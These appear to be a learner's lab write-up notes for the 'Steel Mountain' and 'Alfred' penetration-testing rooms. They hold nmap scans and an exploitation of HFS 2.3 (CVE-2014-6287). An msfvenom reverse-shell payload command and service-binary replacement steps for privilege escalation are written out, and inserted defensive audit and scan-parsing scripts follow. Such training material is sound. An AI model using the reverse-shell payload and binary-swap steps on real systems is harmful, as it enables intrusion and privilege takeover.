No matter where you are, the skills and requirements for a penetration tester will be the same. You'll be required to have a good understanding of various aspects of information security, including web applications, networks and sometimes even low-level technology such as assembly. A good understanding of these technologies is essential to learning how to exploit them.
The aim of this path is to make you ready for real-world penetration testing by teaching you how to use industry-standard tools along with a methodology for finding vulnerabilities in machines. By the time you complete this path, you will be well prepared for interviews and jobs as a penetration tester. To complete this path you should have a basic to medium understanding of computing.
You can use this pathway to help you acquire the skills needed to get certified by well-known certifiers in the security industry.
---
This contains a bunch of my notes that I wrote while taking this learning path.
## Getting Started
I had already completed this section some time ago. It's easy enough that I won't be writing about it now, though I may write something about it when I have free time. It is the first part of the path, with easy rooms based on practicing in these areas:
1. Active Reconnaissance
2. Vulnerability Scanning
3. Privilege Escalation
4. Web Application Attacks
The rooms were:
1. Kenobi
2. Tutorial
3. Vulnversity
4. Blue
## Advanced Exploitation
### Steel Mountain
#### Enumeration
```
Nmap scan report for ip-10-10-156-16.eu-west-1.compute.internal (10.10.156.16)
Host is up (0.00052s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl Microsoft SChannel TLS
|_fingerprint-strings: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2022-07-08T18:03:59
|_Not valid after: 2023-01-07T18:03:59
|_ssl-date: 2022-07-09T18:06:49+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=7/9%Time=62C9C37D%P=x86_64-pc-linux-gnu%r(TLS
SF:SessionReq,346,"\x16\x03\x03\x03A\x02\0\0M\x03\x03b\xc9\xc3x\xa3\xa3\x1
SF:ax\xc5\xdd8\x86\xfb\xb6L\xcc=\x8b\*\xdf\x05\xab\x9f\xeais\xd5\[\x0f\x07
SF:\xf8\x98\x20\xae\x07\0\0\xec\n\x0e\xe0\x9aY\x93\xc2n\xc9v1d\x02QB\xf8w\
SF:xd2L\xd3\x15\xf2\x9a\xe4\xac\x02x\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\
SF:xe8\0\x02\xe5\0\x02\xe20\x82\x02\xde0\x82\x01\xc6\xa0\x03\x02\x01\x02\x
SF:02\x10W\*\xa5Gv\xc1\xfb\x88N%\xe5a\xb2\xdf\xd3\xcb0\r\x06\t\*\x86H\x86\
SF:xf7\r\x01\x01\x05\x05\x000\x181\x160\x14\x06\x03U\x04\x03\x13\rsteelmou
SF:ntain0\x1e\x17\r220708180359Z\x17\r230107180359Z0\x181\x160\x14\x06\x03
SF:U\x04\x03\x13\rsteelmountain0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x
SF:01\x01\x05\0\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\x9e\xe0\x
SF:c6\xac\xf7\xd0<J\xbc\*l\xe0\x7f\xe3\xe6\x98\xe29\x06\xcd\xceS\x8a5\xc1\
SF:xa5\)\xd0\xb1\x85O\xf78\xf8\xed\]\x83;\x1203\xddT!-\x9a\x1a\x19\xeb\$=\
SF:xdfA\xf9\x1c\x8e\x075m\xe4\x18\xfd42\x15SE\x94\xcfn4\"\xea\xff@Y\x9a\x1
SF:9\xecYx\x88\xca\|\xf47p{\x03\^\x13\xcd6x\x93\x03&\x17\xd4\xf3n\x8f\x1cw
SF:\x97\xc20\x7f\x99@\x87a\x0f\xcb\x7f6d\x13C\x0c\x99\xb6\xde}:\xf2\xd2\xe
SF:a\xe0\xf5\xe1\x93H\x8b\xc95\xa5\xbe\|\xec\xe9\x92\xb9h\xed\na\x1a\x12\x
SF:e0\xfe\\K\x04\x06`q:\xa7S%\x1d\xa2!q\x02p\)\xe7r\xd4d4e\)04\xbaO\x05\xa
SF:7\xf0:\xc2\xbb\x81\x12\xa3b\x006n\xdd\xb8\x0b\\x\+\xa3\x04\xfaV\x0b\)\x
SF:0f\xc4\x9b\xf3\x18\$\xe5\n\xac\xbd\xcd\)\xc9\xed\x1d\?\xa1\xed\xc8\^wx\
SF:xbdV\xb2ST\x9c\x13C\?\x0b_\x987\x1d\x96\xe3\]\x81z1\xf1_\xe5\x7fCP1\x1f
SF:\x87\xcf\x02\x03\x01\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x
SF:08\+\x06\x01\x05\x05\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\
SF:x0400\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0\x8d\
SF:xf5'\)\x9b\x14\x8b\xa7\xaa\x19Zg\xe9\x82\x17\^\x88m\x99\x02\xfe\xbc\x91
SF:\x80\xce\xc6\xbe\xfaI,\x07\xdd\x07\n\xd5\x90G\x95!\x05\xc0\x06llj\xf0\x
SF:bbq\xa9m#\x13!\x89\xc4\xed\xb3Q\x8c\xb7\x86r_{We\x03\xebL\xe49<\xe6\xff
SF:\x19\x07HW\x12\x97\x83\xf0\x9chgj\xcd!\x02\xcbz\xd4\x82\xb2\x9aA\xf0\x8
SF:c&\(\x85I\x12\x03!\xa7\x89\xf8\x86e\x9a\xea_\^\xc3\^fq\xcc\x96l\xb9\xdd
SF:n\x02<;\x17\x10\xe0\x82\x1d\xed\xc5\xd8\xc9\xe8\xcf\x19O\xac\xde\xd6\xe
SF:c\xf4eP-\xdc\x91\x98\x1b7Ll\xa5\xba\x8bgp%k\x85\n\xbfs\xd9q\xe62\xdc%\x
SF:d7\x8f:\0\x9eN\x1d3tzL-7\x95>\x9f\xa4'\xac\+=\xb6\x15\x10Z\xa5\xd8q\x9a
SF:\x92,\x97\xb4\xdc<2\x0e8\xf2ZM\xaaZ\xd0\^\xc8<\x01\x16\xaa\]y\x95\xceG\
SF:xd1\x7ft;;\xe8tS\xdc\+\0\x01\xcd\x07\x9c\x14M\xaa\x1f\xbc}\xf5\xe2\xd7J
SF:\xad\xef\xe68\x0e\0\0\0");
MAC Address: 02:66:B3:26:00:81 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/9%OT=80%CT=1%CU=35918%PV=Y%DS=1%DC=D%G=Y%M=0266B3%TM
OS:=62C9C3BE%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=I%CI=I%TS=7)
OS:SEQ(SP=105%GCD=1%ISR=106%TI=I%CI=RD%II=I%SS=S%TS=7)SEQ(SP=105%GCD=1%ISR=
OS:106%TI=I%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2
OS:301NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2
OS:000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=
OS:Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%R
OS:D=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:66:b3:26:00:81 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-09 19:06:50
|_ start_date: 2022-07-09 19:03:52
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms ip-10-10-156-16.eu-west-1.compute.internal (10.10.156.16)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.90 seconds
```
I notice the server type, which is Windows Server 2008 R2. I also noticed HttpFileServer 2.3 running on port `8080`, and port `80` is running a normal web server.
Opening port 80 in the browser:

It displays an image of the employee of the month, which is the answer to the first question of the room. We don't know the name of the employee, only the image, so I viewed the source of the page and found the link to the image, whose file name contains the employee's name:
`http://10.10.156.16/img/BillHarper.png`
And there we have it: the answer for the Introduction part is `Bill Harper`.
The other question in the Initial Access part asks about the other port running a web server, which is port 8080. I decided to take a closer look at it.

I decided to look on exploit-db for any vulnerability disclosed for the version of the service running on port 8080.

Fortunately there is `Arbitrary file upload` and `Remote Command Execution`, which can be achieved after the `Arbitrary file upload`.
#### Initial Foothold
The CVE for the vulnerability to be exploited is `CVE-2014-6287`.
I used a Metasploit module to exploit this vulnerability and was able to get a shell as user `bill`.

The flag for user is found in `C:\Users\bill\`
#### Privilege Escalation [With Metasploit]
For the privilege escalation part, the room gives a brief explanation of privilege escalation and the use of `PowerUp.ps1`.
We can now see that the CanRestart option is set to true for the running AdvancedSystemCare 9 service:

This means we can replace the legitimate application with a malicious one and then restart the service, which will run our program and provide us with a reverse shell.
I first used Metasploit to create a payload with the command `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=1234 -f exe -o Advanced.exe`.
Then, from the session, I opened a shell and stopped the service with `sc stop AdvancedSystemCareService9`, closed the shell, and uploaded the file `Advanced.exe` to `/Program Files (x86)/IObit/Advanced SystemCare/ASCService.exe`.
I opened another terminal and set up a listener, then went back to my session, opened a shell, and restarted the service with `sc start AdvancedSystemCareService9`.
The root flag is in `C:\Users\Administrator\Desktop\root.txt`
#### Privilege Escalation [Without Metasploit]
You can use an automated script such as winPEAS to discover detailed information about the running services, the users, and the system as a whole.
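The misconfiguration the room relies on is a service whose binary a low-privileged user can overwrite and then restart. The following is an added example, not code from the room, from PowerUp or from winPEAS: a defender-side audit that walks a list of services (name, binary path, whether the current account can restart it, the fields PowerUp reports) and flags those whose binary file or containing directory is writable. The `SAMPLE_SERVICES` entry reuses the service name and path from these notes and is a constructed sample. It uses `os.access` as a portable approximation; on Windows that call only honours the read-only attribute, not the ACL, so on a real host pass an ACL-aware predicate (for example built on `icacls` or `Get-Acl` output) through the `writable` parameter.

```python
import os
from pathlib import Path

# Constructed sample modelled on the service found in these notes: the service name
# and path are the ones from the notes, can_restart is what PowerUp reported.
SAMPLE_SERVICES = [
    {"name": "AdvancedSystemCareService9",
     "binary_path": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
     "can_restart": True},
]


def binary_is_modifiable(binary_path):
    """True if the current account could replace the service binary: either the file
    itself is writable, or its directory is writable (so the file can be renamed or
    recreated). Service paths are absolute; a relative path means the string did not
    parse as a path on this platform, so it is reported as not modifiable rather than
    falling back to the current directory."""
    p = Path(binary_path)
    if not p.is_absolute():
        return False
    if os.access(p, os.W_OK):
        return True
    # os.access on Windows checks only the read-only attribute, not the ACL (approximation).
    return p.parent.is_dir() and os.access(p.parent, os.W_OK)


def audit_services(services, writable=binary_is_modifiable):
    """Return (name, severity, reason) for each service whose binary the current
    account could swap. 'high' when the same account can also restart the service
    (the replacement runs immediately as the service account), 'medium' when it
    would only run at the next service start or reboot."""
    findings = []
    for svc in services:
        if not writable(svc["binary_path"]):
            continue
        if svc.get("can_restart"):
            findings.append((svc["name"], "high",
                             "binary writable and service restartable by current account"))
        else:
            findings.append((svc["name"], "medium",
                             "binary writable; replacement would run on next service start"))
    return findings


if __name__ == "__main__":
    results = audit_services(SAMPLE_SERVICES)
    for name, severity, reason in results:
        print(f"[{severity}] {name}: {reason}")
    if not results:
        print("no modifiable service binaries found from this account")
```

The fix for a `high` finding is the one the room implies in reverse: restrict write access on the service directory to administrators and remove the service's start/stop rights from non-admin accounts, then re-run the audit.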
### Alfred
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
#### Enumeration
First I did an nmap scan to find which ports are open and what services are running on them.
```
Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-10 19:56 BST
Nmap scan report for ip-10-10-67-79.eu-west-1.compute.internal (10.10.67.79)
Host is up (0.00042s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-07-09T18:54:41
|_Not valid after: 2023-01-08T18:54:41
|_ssl-date: 2022-07-10T18:56:36+00:00; 0s from scanner time.
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 02:CC:15:48:C3:93 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms ip-10-10-67-79.eu-west-1.compute.internal (10.10.67.79)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.62 seconds
```
To answer the first question, there are 3 open ports. Port 80 is running the IIS web server and port 8080 is running Jetty. These two are the only ports that caught my attention.
Exploring port 80, I was able to get a hint about what the username of one of the users on the system might be.

And that is `alfred`.
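Both enumeration sections (Steel Mountain and Alfred) work the same way: read the nmap report, pick out the service versions and the NSE script lines that matter, and look the versions up. As an added example, not code from the notes or from nmap, the following Python parses nmap's normal output format into port records plus host-level script lines and turns them into defender findings: risky HTTP methods, SMB signing state, and a version-to-advisory match. The two scan strings are constructed samples trimmed from the reports above, and the only advisory in `KNOWN_VULNERABLE` is the one the notes name (HFS 2.3, CVE-2014-6287); a real deployment would feed that table from a vulnerability database.

```python
import re
from dataclasses import dataclass, field

# Matches port lines of nmap's normal output, e.g. "8080/tcp open http HttpFileServer httpd 2.3".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Constructed samples: trimmed copies of the two scan reports in these notes.
STEEL_MOUNTAIN_SCAN = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl Microsoft SChannel TLS
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

ALFRED_SCAN = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
3389/tcp open tcpwrapped
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
"""

# (product prefix, version) -> advisory. The single entry is the one these notes identified.
KNOWN_VULNERABLE = {
    ("HttpFileServer httpd", "2.3"): "CVE-2014-6287 (arbitrary file upload / remote command execution)",
}


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE script lines attached to this port


def parse_nmap(text):
    """Split normal-format nmap output into Port records plus host-level script lines."""
    ports, host_scripts = [], []
    current = None  # the list that following "|" script lines attach to
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5).strip())
            ports.append(port)
            current = port.scripts
        elif line.startswith("Host script results"):
            current = host_scripts
        elif line.startswith("|") and current is not None:
            current.append(line.lstrip("|_ ").strip())  # drop nmap's "| " / "|_ " prefixes
    return ports, host_scripts


def assess(ports, host_scripts):
    """Return (port, message) findings a defender would act on."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        for s in p.scripts:
            if s.startswith("Potentially risky methods") and "TRACE" in s:
                findings.append((p.number, "HTTP TRACE enabled; disable it on the web server"))
        for (product, ver), ref in KNOWN_VULNERABLE.items():
            if p.version.startswith(product) and p.version.endswith(ver):
                findings.append((p.number, f"{p.version} matches {ref}; upgrade or remove it"))
    smb = next((p.number for p in ports if p.service == "microsoft-ds"), None)
    for s in host_scripts:
        low = s.lower()
        if low.startswith("message_signing: disabled"):
            findings.append((smb, "SMB1 message signing disabled; require signing (tampering risk)"))
        elif low.startswith("message signing enabled but not required"):
            findings.append((smb, "SMB2 message signing not required; enforce it via Group Policy"))
    return findings


if __name__ == "__main__":
    for name, scan in (("Steel Mountain", STEEL_MOUNTAIN_SCAN), ("Alfred", ALFRED_SCAN)):
        print(f"== {name} ==")
        for port, msg in assess(*parse_nmap(scan)):
            print(f"  {port}: {msg}")
```

Run it against a saved `nmap -sV -sC -oN scan.txt` report by reading the file into `parse_nmap`; the same structure extends to other script outputs (for instance `ssl-cert` expiry) by adding branches to `assess`.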
---
**WILL CONTINUE THE NOTES SOON**